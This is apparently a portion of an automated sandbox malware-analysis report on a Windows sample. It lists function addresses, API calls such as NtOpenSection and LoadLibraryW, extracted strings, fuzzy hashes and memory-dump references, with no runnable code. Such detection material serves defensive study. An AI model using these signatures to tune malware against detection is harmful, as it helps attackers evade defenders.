                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: SectionView
                    • String ID:
                    • API String ID: 1323581903-0
                    • Opcode ID: f30e6b5abe41fe527e24dea1938905443cefc0b45d4624101ad07ab4685eae78
                    • Instruction ID: 1cf53d80169a863b90f1134cc72a50ea3fa76af9debc963479623cb667fdf66e
                    • Opcode Fuzzy Hash: f30e6b5abe41fe527e24dea1938905443cefc0b45d4624101ad07ab4685eae78
                    • Instruction Fuzzy Hash: 2AF01C75280750EFE7219F18EC42F21B7F5BB09714F100618F7929AAE1C7B2B810CB04
                    Function 003E27AF Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtOpenSection.NTDLL(?,00000004), ref: 003E27C9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: OpenSection
                    • String ID:
                    • API String ID: 1950954290-0
                    • Opcode ID: 6a1e0cafc048e26387fb26b8d943c6b385cc204a00cd978b1e44c4f63c131420
                    • Instruction ID: e627f3ec0eedcfd34e1d51de8a1f7414a25a7c7875c5fd4d612467612d91c07c
                    • Opcode Fuzzy Hash: 6a1e0cafc048e26387fb26b8d943c6b385cc204a00cd978b1e44c4f63c131420
                    • Instruction Fuzzy Hash: 11E08CB2040280DBD746DB65EC02A3273A9BB84308F041018E282EB691C772F912CB80
                    Function 003C390E Relevance: .1, Instructions: 59COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b6dd54768cb7e855c9eb4fcb055b316d9348a497885de48739d8556c552276aa
                    • Instruction ID: 39e959bea0cbeb5aa21531739aa3b494c57b9db570a597fbfd738ee5ce804c97
                    • Opcode Fuzzy Hash: b6dd54768cb7e855c9eb4fcb055b316d9348a497885de48739d8556c552276aa
                    • Instruction Fuzzy Hash: 0C2167B16007408FEB26DF24C9D1B96B7F2AF46304F08886CD99A8F766DB74E905CB51
                    Function 003DAE8B Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 152COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • KiUserCallbackDispatcher.NTDLL ref: 003DAE8B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: CallbackDispatcherUser
                    • String ID: $p>$p>$p>$p>$p>$p>$p>$p>$p>$p>
                    • API String ID: 2492992576-1812397219
                    • Opcode ID: 6173d61ef9a56b267123158d20f8c8fe99bcdc816061f31d19b6d1f23be09307
                    • Instruction ID: 3ea704d0411974c563dd8f76004d40607e121de4cedbc70c0840235cfe875092
                    • Opcode Fuzzy Hash: 6173d61ef9a56b267123158d20f8c8fe99bcdc816061f31d19b6d1f23be09307
                    • Instruction Fuzzy Hash: AB81BEB85093808FC365EF69D584A9EBBF0BBC9304F004A2DE48987390DBB09949CB53
                    Function 004097D7 Relevance: 10.6, APIs: 7, Instructions: 105COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 274 4097d7-4097e4 275 409862-409866 274->275 276 4097e6-4097e7 call 40dd97 274->276 278 409868-40986e 275->278 279 409899-40989c 275->279 284 4097ec-4097ef 276->284 280 409870-40987c 278->280 281 4097f1-4097f3 278->281 282 4098f7-4098fa 279->282 283 40989e-4098b5 call 40ab70 call 40d292 279->283 285 409883-409886 280->285 286 40987e call 40d5e2 280->286 289 409906-409909 281->289 290 409903-409905 282->290 291 4098fc-409902 call 40ae8a 282->291 283->281 305 4098bb-4098d2 call 40aaf5 283->305 284->281 288 4097f8-4097ff call 40aef8 284->288 285->290 295 409888-409897 call 40d893 call 40aba4 call 40ddc7 285->295 286->285 302 409801-409806 call 40ddc7 288->302 303 409808-409829 call 40dd4b call 442f88 call 40dc14 call 40d63f 288->303 290->289 291->290 295->290 302->281 330 409832-409839 call 40db59 303->330 331 40982b-409830 call 40aba4 303->331 320 4098d4-4098e9 call 40abe1 call 50f2f3 305->320 321 4098eb-4098f2 call 409fe4 305->321 320->290 321->281 337 40985b-409860 call 40d893 330->337 338 40983b-409842 call 40d8e1 330->338 331->302 337->331 338->337 343 409844-40984e call 40d41b 338->343 343->337 346 409850-409856 343->346 346->290
                    APIs
                    • __RTC_Initialize.LIBCMT ref: 00409808
                    • __mtterm.LIBCMT ref: 0040982B
                      • Part of subcall function 0040ABA4: TlsFree.KERNEL32(00000003,00409892), ref: 0040ABCF
                    • __setenvp.LIBCMT ref: 0040983B
                    • __cinit.LIBCMT ref: 00409846
                    • __mtterm.LIBCMT ref: 0040988D
                    • ___set_flsgetvalue.LIBCMT ref: 0040989E
                      • Part of subcall function 0040AB70: TlsGetValue.KERNEL32(?,004098A3), ref: 0040AB79
                      • Part of subcall function 0040AB70: TlsSetValue.KERNEL32(00000000,004098A3), ref: 0040AB9A
                      • Part of subcall function 0040D292: __calloc_impl.LIBCMT ref: 0040D2A3
                      • Part of subcall function 00409FE4: ___sbh_find_block.LIBCMT ref: 0040A00D
                      • Part of subcall function 00409FE4: ___sbh_free_block.LIBCMT ref: 0040A01C
                      • Part of subcall function 00409FE4: HeapFree.KERNEL32(00000000,0040861F,00417CF8,0000000C,0040F32F,00000000,00417FE8,0000000C,0040F369,0040861F,0040861F,?,0040D3CF,00000008,00000000,0040861F), ref: 0040A04C
                    • __freeptd.LIBCMT ref: 004098FD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: FreeValue__mtterm$HeapInitialize___sbh_find_block___sbh_free_block___set_flsgetvalue__calloc_impl__cinit__freeptd__setenvp
                    • String ID:
                    • API String ID: 3004107213-0
                    • Opcode ID: 1d2aab9d701c9ca5c068e647ca80e9f78ce663bd266a7484a82d2817e3bdaac9
                    • Instruction ID: 7b7dc12e4a12096ccc277b92f8813e3a977cf60cca017ba34d6bbf3c6cc89e65
                    • Opcode Fuzzy Hash: 1d2aab9d701c9ca5c068e647ca80e9f78ce663bd266a7484a82d2817e3bdaac9
                    • Instruction Fuzzy Hash: 4721A272924202A9D6247BF75C0256F3268AF92368B30843FF455B12C3EA3DDC46A56F
                    Function 003DF3FF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                    Download Yara Rule
                    APIs
                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 003DF43F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: InformationVolume
                    • String ID: C$\
                    • API String ID: 2039140958-514332402
                    • Opcode ID: 1760bfdeb2e2c5055438ba07e51d38c769a694237b11f9e82d76cd3e4ebc1343
                    • Instruction ID: dd32f4c7ea7d5731d193df43b515839d3e23b82b5fb0d2116d99bf3a47b1b625
                    • Opcode Fuzzy Hash: 1760bfdeb2e2c5055438ba07e51d38c769a694237b11f9e82d76cd3e4ebc1343
                    • Instruction Fuzzy Hash: 69F065B5685341BBE319CF10EC56F2A32949784704F10442CB646AA1D1D7F0BA14CB59
                    Function 003E0EBB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67memoryCOMMON
                    Download Yara Rule
                    APIs
                    • RtlFreeHeap.NTDLL(00000000,00000000), ref: 003E0F4C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID: \-"#
                    • API String ID: 3298025750-2514456039
                    • Opcode ID: 1cfdb7b9af250b36df29f4763a543bc962410426ba1312b48e21f4250cf7d2df
                    • Instruction ID: e841fa391f31dd7b090c2b8f46752affdf1d06ceb191221cfd0c932a2470edd1
                    • Opcode Fuzzy Hash: 1cfdb7b9af250b36df29f4763a543bc962410426ba1312b48e21f4250cf7d2df
                    • Instruction Fuzzy Hash: F0111C702083519FD318CF14D8A4B2BBBA2FBC5318F148A1CE8AA47791C7759946CB86
                    Function 003E349A Relevance: 1.6, APIs: 1, Instructions: 124libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 18773158874858480531784dff4092e23d874de3c66bd5f908e7bdc2364e6812
                    • Instruction ID: e7c9e5882397a5c3f2b22080536da34c1f50aa6f6661223147bdf20149117e76
                    • Opcode Fuzzy Hash: 18773158874858480531784dff4092e23d874de3c66bd5f908e7bdc2364e6812
                    • Instruction Fuzzy Hash: 04417CB4100B42EBD316CF26ECA1636BBB5FB46301F508B18D4564BBA1D730E6A5CF94
                    Function 003E0D33 Relevance: 1.6, APIs: 1, Instructions: 111memoryCOMMON
                    Download Yara Rule
                    APIs
                    • RtlAllocateHeap.NTDLL(?,00000000), ref: 003E0DDC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: d5d16adece008cf24671bb22b64977da42be0ce23746572b20d33e977c6fdab5
                    • Instruction ID: 6497b3f4884a040deebaaf070356ee0a7c2dbc2cb4cfc1337576f105225314f3
                    • Opcode Fuzzy Hash: d5d16adece008cf24671bb22b64977da42be0ce23746572b20d33e977c6fdab5
                    • Instruction Fuzzy Hash: CF4144342406418FD315CF29C894B16BBA3EB85324F24C66CD9A58BBA5D776F847CB80
                    Function 003D6265 Relevance: 1.6, APIs: 1, Instructions: 92memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: AllocString
                    • String ID:
                    • API String ID: 2525500382-0
                    • Opcode ID: 65d317bb8979a2a77814610f74c8b460754ad209f6c7a8f6fe89411d827484bb
                    • Instruction ID: 7c5ed448b9bd3195eb83bb973d822afec22e540109a021bc0930568c4f74348a
                    • Opcode Fuzzy Hash: 65d317bb8979a2a77814610f74c8b460754ad209f6c7a8f6fe89411d827484bb
                    • Instruction Fuzzy Hash: FE51B47111CBC28AC331CB28889978ABFE1ABD6224F184B5DE5E98B3E1C7758145CB57
                    Function 003E2E56 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: d4729bf83480ca908db07acde3c66166cb75614bcee9e37b2af701265aac86e8
                    • Instruction ID: ae88f7bb4549c9d4c8249cd9d7fa0c6be4b05c85f89ab1975f0a109fab905141
                    • Opcode Fuzzy Hash: d4729bf83480ca908db07acde3c66166cb75614bcee9e37b2af701265aac86e8
                    • Instruction Fuzzy Hash: CE219DB4100B82EBD316CF22ECA1632BBA5FB45301F508B1CD45647BA1D730A6A1CB94
                    Function 003E3396 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryW.KERNELBASE(?), ref: 003E342A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 7b6d0977b32dac14aed288272dd668009a8be9ee16f06efa9f4476a618a962c0
                    • Instruction ID: 2ff6ab5db6472f14ec3c3c7d0d9401b6f70808053875fd697ab275dcb9f1567d
                    • Opcode Fuzzy Hash: 7b6d0977b32dac14aed288272dd668009a8be9ee16f06efa9f4476a618a962c0
                    • Instruction Fuzzy Hash: AA1114B4204B428BC31ACF26D8A4727BBB5FF46314F509A4CC4A65BBA1C730F981CB84
                    Function 003E31B5 Relevance: 1.5, APIs: 1, Instructions: 48libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 12ac4b3895e5243134287c7e399db5f867efcab4716ab9b26e6eaaff746481be
                    • Instruction ID: 75757d7d3a5b93238b5428a6a217a4facbd6b80032b978410210a0cf299a7c4a
                    • Opcode Fuzzy Hash: 12ac4b3895e5243134287c7e399db5f867efcab4716ab9b26e6eaaff746481be
                    • Instruction Fuzzy Hash: 0D1137741007428BD31ACF16D5A4626FBB2BF85314F5ACA4DC4A64BB95CB34E582CF84
                    Function 003E423D Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON
                    Download Yara Rule
                    APIs
                    • RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 003E42D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: abfe98364a4d678f2344e45f3de73fefe6a360999204b78082e002f642c0c594
                    • Instruction ID: 91446048f28d2a0c978e80a953fe3d596ccf1c3ae6827259e2bf77e5a202e381
                    • Opcode Fuzzy Hash: abfe98364a4d678f2344e45f3de73fefe6a360999204b78082e002f642c0c594
                    • Instruction Fuzzy Hash: D01145766093519FD300CF05C84435FFBA2EBC4329F25CA58E9A827284D731D90A8BD2

                    Non-executed Functions

                    Function 003CFB8E Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 637COMMON
                    Download Yara Rule
                    APIs
                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 003CFC9D
                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 003CFCC6
                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 003D00DD
                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 003D010B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: EnvironmentExpandStrings
                    • String ID: MO${cC$qrs
                    • API String ID: 237503144-1992789174
                    • Opcode ID: 35474ca0131c7b413e63086aa1a9a18a00b2b52538884f31401b1e26a0fb69e9
                    • Instruction ID: 301548fee9ff3eb5adab49ec195b2a17973c6731a4a4a70ada91432d9d51f28c
                    • Opcode Fuzzy Hash: 35474ca0131c7b413e63086aa1a9a18a00b2b52538884f31401b1e26a0fb69e9
                    • Instruction Fuzzy Hash: 273249B1500A009FD725CF29C495B17BBF2FB89324F158A5DD8AA8BB99D730E815CBC1
                    Function 003CCB80 Relevance: 12.8, Strings: 10, Instructions: 261COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID: 8#$@%z'$X!G#$Y5[7$Z-K/$d)C+$d9:;$s1]3$s;$s}
                    • API String ID: 0-3001701124
